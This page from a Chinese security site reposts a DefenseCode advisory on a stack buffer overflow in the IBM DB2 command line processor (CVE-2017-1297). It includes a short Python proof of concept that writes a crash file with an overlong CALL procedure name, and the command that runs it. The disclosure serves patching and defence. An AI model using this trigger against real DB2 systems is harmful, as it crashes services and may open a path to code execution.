首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow
来源:http://www.defensecode.com 作者:defensecode 发布时间:2017-06-27  
'''
           DefenseCode Security Advisory
    IBM DB2 Command Line Processor Buffer Overflow
 
 
Advisory ID: DC-2017-04-002
Advisory Title: IBM DB2 Command Line Processor Buffer Overflow
Advisory URL:
http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf
Software: IBM DB2
Version: V9.7, V10.1, V10.5 and V11.1 on all platforms
Vendor Status: Vendor Contacted / Fixed (CVE-2017-1297)
Release Date: 26.06.2017
Risk: High
 
 
1. General Overview
===================
IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) Command
Line Process (CLP) is vulnerable to a stack based buffer overflow, caused
by improper bounds checking which could allow an attacker to execute
arbitrary code. The vulnerability is triggered by providing an overly
long procedure name inside a CALL statement.
 
 
2. Software Overview
===================
DB2 is a database product from IBM. It is a Relational Database Management
System. DB2 is designed to store, analyze and retrieve the data efficiently.
DB2 currently supports Linux, UNIX and Windows platforms.
 
db2bp is a persistent background process for the DB2 Command Line
Processor,
and it is the process which actually connects to the database.
 
 
3. Brief Vulnerability Description
==================================
By providing a specially crafted command file to the db2 CLP utility, it is
possible to cause a buffer overflow and possibly hijack the execution flow
of the program. Crafted file contains a CALL statement with an overly long
procedure parameter.
 
3.1 Proof of Concept
 
The following python script will generate a proof of concept .sql crash
test
file that can be used to verify the vulnerability:
 
-------
'''
 
#!/usr/bin/python
 
load_overflow = 'A' * 1000
statement = "CALL " + load_overflow + ";"
 
crash_file = open("crash.sql", "w")
crash_file.write(statement)
crash_file.close()
 
'''
-------
 
PoC usage: db2 -f crash.sql
 
 
4. Credits
==========
Vulnerability discovered by Leon Juranic, further analysis by Bosko
Stankovic.
 
 
5. About DefenseCode
================================
DefenseCode L.L.C. delivers products and services designed to analyze
and test
web, desktop and mobile applications for security vulnerabilities.
 
DefenseCode ThunderScan is a SAST (Static Application Security Testing,
WhiteBox
Testing) solution for performing extensive security audits of
application source
code. ThunderScan performs fast and accurate analyses of large and complex
source code projects delivering precise results and low false positive rate.
 
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
BlackBox
Testing) solution for comprehensive security audits of active web
applications.
WebScanner will test a website's security by carrying out a large number of
attacks using the most advanced techniques, just as a real attacker would.
 
Subscribe for free software trial on our website http://www.defensecode.com/
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JAD Java Decompiler 1.5.8e - B
·Microsoft Skype 7.2 / 7.35 / 7
·NTFS 3.1 - Master File Table D
·Easy File Sharing Web Server 7
·Easy File Sharing HTTP Server
·Microsoft Word MTA Handler Rem
·Symantec Messaging Gateway Rem
·FASM 1.7.21 Buffer Overflow
·Netgear DGN2200 dnslookup.cgi
·Easy File Sharing Web Server 7
·PHPMailer < 5.2.20 with Exim M
·Easy File Sharing Web Server 7
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved